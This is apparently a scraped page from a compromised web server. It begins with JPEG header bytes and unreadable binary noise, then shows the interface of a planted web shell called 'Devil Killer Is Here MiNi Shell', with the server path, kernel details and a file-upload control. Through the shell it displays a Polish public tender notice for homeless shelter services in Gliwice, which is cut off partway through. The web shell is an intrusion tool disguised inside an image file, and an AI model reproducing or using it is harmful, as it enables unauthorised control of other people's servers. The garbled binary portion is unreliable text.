JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230227/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230227/0011183501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> 2023- Zapewnienie tymczasowego schronienia w schronisku osobom bezdomnym (kobietom i mężczyznom) kierowanym przez Ośrodek Pomocy Społecznej w Gliwicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OŚRODEK POMOCY SPOŁECZNEJ W GLIWICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003451973</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Górnych Wałów 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gliwice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 335 97 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">32 230 80 27</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ops@ops.gliwice.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://opsgliwice.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> 2023- Zapewnienie tymczasowego schronienia w schronisku osobom bezdomnym (kobietom i mężczyznom) kierowanym przez Ośrodek Pomocy Społecznej w Gliwicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5d4d1f6e-b359-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00111835</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00029950/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Zapewnienie tymczasowego schronienia w schronisku osobom bezdomnym</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-5d4d1f6e-b359-11ed-9236-36fed59ea7dd <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) w postępowaniu o udzielenie zamówienia publicznego komunikacja miedzy Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2) Zamawiający dopuszcza również komunikacje za pomocą poczty elektronicznej na adres e-mail: ops@ops.gliwice.eu (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”,<br/>2) przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania,<br/>3) sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopia elektroniczna treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych,<br/>4) dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, wskazane w rozdziale &#34;Dokumenty lub oświadczenia, składane w toku postępowania o zamówienie publiczne&#34; oraz &#34;Opis sposobu przygotowania i składania oferty&#34; niniejszej specyfikacji, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (KIR), z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki.<br/>Ponadto, do kompresji (zmniejszenia objętości) dokumentów elektronicznych Zamawiający dopuszcza również możliwość przekazywania dokumentów w formacie &#34;.rar&#34;, natomiast do danych zawierających informacje graficzna - format &#34;.bmp&#34;.<br/>Preferowane przez Zamawiającego formaty:<br/>a) danych: .pdf, .doc, .docx, .rtf, .odt, .ods, .xls, .xlsx, .jpg (.jpeg);<br/>b) kompresji dokumentów elektronicznych: .zip, .7z.<br/>W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania,<br/>5) informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Radym Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a) w formatach danych określonych w pkt 4) i przekazuje się jako załącznik, lub<br/>b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej, np. w treści wiadomości e-mail (nie dotyczy składania ofert) lub w treści &#34;Formularza do komunikacji&#34;,<br/>6) jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnice przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnice przedsiębiorstwa” – dotyczy zarówno etapu składania ofert oraz dokumentów/oświadczeń składanych w toku postępowania o zamówienie publiczne,</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rozdziałem 27 Specyfikacji Warunków Zamówienia (SWZ)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OPS-ZP.321.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ I - ZAPEWNIENIE TYMCZASOWEGO SCHRONIENIA W SCHRONISKU DLA BEZDOMNYCH KOBIET KIEROWANYCH PRZEZ OŚRODEK POMOCY SPOŁECZNEJ W GLIWICACH.<br/><br/>Przedmiotem zamówienia jest zapewnienie na podstawie: <br/>a)	art. 48 a ustawy z 12 marca 2004r. o pomocy społecznej (tj. Dz.U. z 2021 poz. 2268 z późn. zm.)<br/>b)	Rozporządzenia Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz.U. z 2018 poz. 896) tymczasowego schronienia w schronisku osobom bezdomnym - kobietom kierowanym przez Ośrodek Pomocy Społecznej w Gliwicach w okresie od 01.04.2023r. do 31.03.2024 r. w maksymalnej liczbie 4320 osobodni.<br/>1.	Minimalna liczba osobodni wynosi 2400. Liczba osobodni uzależniona będzie od potrzeb Zamawiającego. <br/>2.	Zamawiający będzie dokonywał zapłaty za faktyczną ilość osobodni świadczonych przez schronisko dla osób bezdomnych nie mniej niż 2400 osobodni. Wykonawcy nie przysługuje roszczenie finansowe z tytułu niewykorzystania maksymalnej liczby osobodni. <br/>3.	Placówka powinna spełniać wymagania sanitarno – epidemiologiczne, przeciwpożarowe oraz inne do prowadzenia wskazanej działalności.<br/>1)	Dla podmiotów, które w dniu wejścia w życie przepisów art. 48a ustawy z 12 marca 2004r. o pomocy społecznej nie prowadziły schroniska dla osób bezdomnych szczegółowy zakres i standard usług świadczonych w ramach pobytu w placówce, standard obiektu oraz kwalifikacje osób świadczących usługi w schronisku powinny być zgodne z Rozporządzeniem Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz.U. z 2018 poz. 896) oraz z art. 48a ustawy z 12 marca 2004r. o pomocy społecznej (tj. Dz.U. z 2021 poz. 2268 z późn. zm.)<br/>2)	Dla podmiotów, które w dniu wejścia w życie przepisów art. 48a ustawy z 12 marca 2004r. o pomocy społecznej prowadziły schronisko dla osób bezdomnych szczegółowy zakres usług świadczonych w ramach pobytu w placówce to:<br/>a)	możliwość całodobowego przebywania w schronisku,<br/>b)	miejsce noclegowe w pokoju wieloosobowym (nie więcej niż 10 osób w jednym pomieszczeniu), w którym temperatura nie jest niższa niż 20°C. <br/>c)	swobodny dostęp do łóżek wyposażonych w materac i komplet pościeli (tj. poduszkę, koc, prześcieradło i pokrycie na koc) oraz dostęp do szafy,<br/>d)	dostęp do pomieszczenia kuchennego umożliwiającego samodzielne przygotowanie posiłku i gorącego napoju oraz jego spożycia, wyposażone w co najmniej jedną kuchenkę i lodówkę oraz szafki kuchenne<br/>e)	dostęp do toalety, prysznica z dostępem do bieżącej ciepłej i zimnej wody w tym jednej toalety i łazienki pozbawionych barier architektonicznych <br/>f)	możliwość prania i suszenia odzieży a w przypadku braku możliwości jej wymiany – dezynfekcję i dezynsekcję,<br/>g)	informację o dostępnych formach pomocy, a w razie potrzeby pomoc w jej zorganizowaniu, <br/>h)	zapewnienie usług aktywizacyjnych ukierunkowanych na wzmacnianie aktywności społecznej, uzyskanie samodzielności życiowej i wyjście z bezdomności,<br/>i)	zapewnienie opieki przez opiekunów posiadających wykształcenie zasadnicze branżowe lub zasadnicze zawodowe, co najmniej roczne doświadczenie w pracy z osobami bezdomnymi oraz ukończone szkolenie z zakresu udzielania pierwszej pomocy lub wykształcenie co najmniej średnie lub średnie branżowe oraz ukończone szkolenie z zakresu udzielania pierwszej pomocy (co najmniej 1 opiekun na nie więcej niż 50 osób przebywających w schronisku, w porze nocnej powinna być w schronisku zapewniona opieka przez co najmniej 1 opiekuna). Nie dopuszcza się do bezpośredniej realizacji przedmiotu zamówienia na stanowisku opiekuna osób korzystających z ww. usługi. W przypadku zatrudnienia na innych stanowiskach wymaganą formą zatrudnienia jest umowa o pracę w minimalnym wymiarze czasu pracy odpowiadającym ½ etatu.<br/>j)	zatrudnienie w schronisku pracownika socjalnego i ścisła współpraca z pracownikami socjalnymi OPS Gliwice.<br/>k)	Wykonawca do dnia wskazanego w art. 4 ustawy z dnia 08.02.2018 r. o zmianie ustawy o pomocy społecznej zobowiązuje się zatrudniać pracownika socjalnego w wymiarze co najmniej 3 dni roboczych w godzinach zgodnych z godzinami pracy Ośrodka Pomocy Społecznej.<br/>l)	Wykonawca zobowiązuje się przekazywać Zamawiającemu harmonogram pracy pracownika socjalnego na każdy miesiąc do ostatniego dnia miesiąca poprzedzającego.<br/>3)	Podmioty, które w dniu wejścia w życie przepisów art. 48a ustawy z 12 marca 2004r. <br/>o pomocy społecznej prowadziły schronisko dla osób bezdomnych powinny do dnia wskazanego w art. 4 ustawy z dnia 08.02.2018 r. o zmianie ustawy o pomocy społecznej dostosować szczegółowy zakres i standard usług świadczonych w ramach pobytu w placówce, standard obiektu oraz kwalifikacje osób świadczących usługi w schronisku do Rozporządzenia Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz.U. z 2018 poz. 896) oraz z art. 48a ustawy z 12 marca 2004r. o pomocy społecznej (tj. Dz.U. z 2021 poz. 2268 z późn. zm.)<br/>4.	Inne wymagania do spełnienia przez podmioty niż wymienione w pkt 3:<br/>1)	Wykonawca wyznacza osobę/osoby do kontaktu z Zamawiającym oraz zapewnia możliwość całodobowego kontaktu telefonicznego z personelem placówki. Do realizacji umowy niezbędne jest posiadanie profilu zaufanego i kontakt z Zamawiającym przez ePUAP <br/>2)	podstawą do realizacji usługi przez Wykonawcę, będzie imienna lista osób uprawnionych do korzystania ze schronienia, przekazywana 2 dni robocze przed rozpoczęciem miesiąca, na który przyznano schronienie. Lista przekazywana będzie za pośrednictwem elektronicznej skrzynki podawczej ePUAP lub zakodowanego emaila. W przypadku przyznania schronienia w trakcie miesiąca Zamawiający będzie dokonywał zgłoszenia w formie elektronicznej,<br/>3)	Wykonawca zapewnia przyjęcie osoby bezdomnej do schroniska w dni robocze w godz. 8:00-19:00,<br/>4)	w sytuacjach wyjątkowych np. warunków atmosferycznych zagrażających zdrowiu i życiu, na zlecenie telefoniczne otrzymane od wyznaczonego pracownika Ośrodka, Wykonawca zapewnia przyjęcie osoby bezdomnej do placówki, codziennie przez całą dobę. Pisemne zlecenie zostanie przekazane przez Zamawiającego za pośrednictwem platformy ePUAP lub zakodowanego e-maila pierwszego dnia roboczego następującego po zgłoszeniu telefonicznym,<br/>5)	w sytuacji wyjątkowej w przypadku placówki znajdującej się poza miastem Gliwice, Wykonawca zapewnia dowóz osoby bezdomnej do placówki własnym transportem, na własny koszt,<br/>6)	sporządzenie przez Wykonawcę regulaminu placówki, określającego zasady współżycia i gwarantującego wszystkim skierowanym osobom bezpieczny pobyt z poszanowaniem godności i prawa do samostanowienia oraz przeciwdziałający praktykom niehumanitarnym i dyskryminującym ze strony personelu i współmieszkańców, <br/>7)	przedstawienie Zamawiającemu do zaakceptowania regulaminu placówki w dniu podpisania umowy oraz konsultowanie i uzgadnianie wszelkich wprowadzonych zmian w regulaminie,<br/>8)	zapoznanie wszystkich osób przyjmowanych do placówki z regulaminem, uzyskanie od klientów pisemnego oświadczenia o zapoznaniu się z regulaminem i zobowiązaniem do jego przestrzegania,<br/>9)	informowanie Zamawiającego w tym samym lub następnym dniu roboczym o każdym przypadku usunięcia osoby z placówki z powodu nieprzestrzegania regulaminu lub dobrowolnego opuszczenia placówki przez osobę skierowaną, pobieranie od niej oświadczenia o miejscu pobytu lub adresu do korespondencji oraz opisane okoliczności <br/>i powodów opuszczenia placówki przez osobę skierowaną,<br/>10)	współpraca na rzecz osób bezdomnych z Ośrodkiem Pomocy Społecznej w Gliwicach oraz innymi instytucjami i organizacjami pozarządowymi,<br/>11)	prowadzenie dokumentacji dotyczącej przebywających w placówce osób umożliwiającą ich identyfikację oraz dokumentację działalności placówki w postaci list obecności mieszkańców oraz indywidualnej dokumentacji mieszkańca zawierającej w szczególności: oświadczenie o zapoznaniu się z regulaminem placówki i deklaracją jego przestrzegania, opis podejmowanych działań z klientem i na rzecz klienta i wszystkie inne istotne informacje dot. sytuacji klienta mające znaczenie i wpływ na uzyskanie samodzielności życiowej,<br/>12)zadania pracownika socjalnego mającego świadczyć wsparcie na terenie schroniska dla bezdomnych: <br/>a)prowadzenie indywidualnej kartoteki, <br/>b)	przekazywanie raz na 2 m-ce Zamawiającemu sprawozdania o realizacji zobowiązań, <br/>c)	w razie potrzeby zgłaszanie do POZ, monitoring ewentualnego procesu leczenia, pomoc w wykupie leków, <br/>d)	pomoc przy załatwianiu orzeczenia o niepełnosprawności, prawa do renty/emerytury, <br/>e)	monitoring poszukiwania pracy, trening dbałości o higienę osobistą, czystość odzieży i wizerunek, <br/>f)	monitoring leczenia uzależnień (uczestnictwo w grupach wsparcia), <br/>g)	monitoring uzyskania mieszkania, <br/>h)	wsparcie w spłacie zadłużenia, <br/>i)	zgłaszanie wszystkich sytuacji nieprzestrzegania regulaminu w szczególności zgłoszenia się w stanie nietrzeźwości, <br/>j)	wsparcie w podtrzymywaniu kontaktów z rodziną.<br/>13)	umożliwienie Zamawiającemu przeprowadzenie kontroli w placówce i udostępnienie wszystkich dokumentów żądanych przez osoby kontrolujące, <br/>14)	wyposażenie placówki w apteczkę pierwszej pomocy medycznej spełniającą normę DIN 13157<br/>15)	przez cały okres trwania umowy Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 50 000,00 zł (słownie: pięćdziesiąt tysięcy zł),<br/><br/>Szczegółowy opis przedmiotu zamówienia W CAŁOŚCI znajduje się w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-04-01 do 2024-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie kryteriów oceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dogodna lokalizacja schroniska – najmniejsza odległość schroniska od Ośrodka Pomocy Społecznej w Gliwicach, ul. Górnych Wałów 9 – trasa ustalana na podstawie najkrótszej odległości po drogach, liczonej w kilometrach (należy dołączyć wydruk z mapy Google) – w przypadku gdy schronisko posiada więcej niż jedną placówkę, najmniejszą odległość Schroniska od OPS oblicza się na podstawie najkrótszej odległości po drogach, liczonej w kilometrach od placówki mieszczącej się w dalszej odległości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II - ZAPEWNIENIE TYMCZASOWEGO SCHRONIENIA W SCHRONISKU DLA BEZDOMNYCH MĘŻCZYZN KIEROWANYCH PRZEZ OŚRODEK POMOCY SPOŁECZNEJ W GLIWICACH<br/><br/>Przedmiotem zamówienia jest zapewnienie na podstawie: <br/>a)	art. 48 a ustawy z 12 marca 2004r. o pomocy społecznej (tj. Dz.U. z 2021 poz. 2268 z późn. zm.)<br/>b)	